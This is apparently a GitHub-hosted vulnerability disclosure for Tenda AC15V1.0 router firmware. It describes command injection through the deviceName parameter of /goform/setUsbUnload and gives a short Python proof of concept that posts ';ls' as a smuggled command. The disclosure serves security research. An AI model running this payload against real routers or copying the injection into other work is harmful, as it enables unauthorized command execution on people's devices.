Skip to content

Latest commit

 

History

History
30 lines (19 loc) · 968 Bytes

setUsbUnload.md

File metadata and controls

30 lines (19 loc) · 968 Bytes

Overview

Affected version

AC15V1.0 V15.03.20_multi

Vulnerability details

In Tenda AC15V1.0 V15.03.20_multi firmware, we discovered a command injection vulnerablility in the deviceName parameter and the v3 varable is directly passed to a doSystemCmd function, causing an arbitrary command execution. The user-provided deviceName can trigger this security vulnerability.

image-20240305231546129

POC

import requests
from pwn import*

ip = "192.168.84.101"
url = "http://" + ip + "/goform/setUsbUnload"
payload = ";ls"

data = {"deviceName": payload}
response = requests.post(url, data=data)
print(response.text)

image-20240314173948333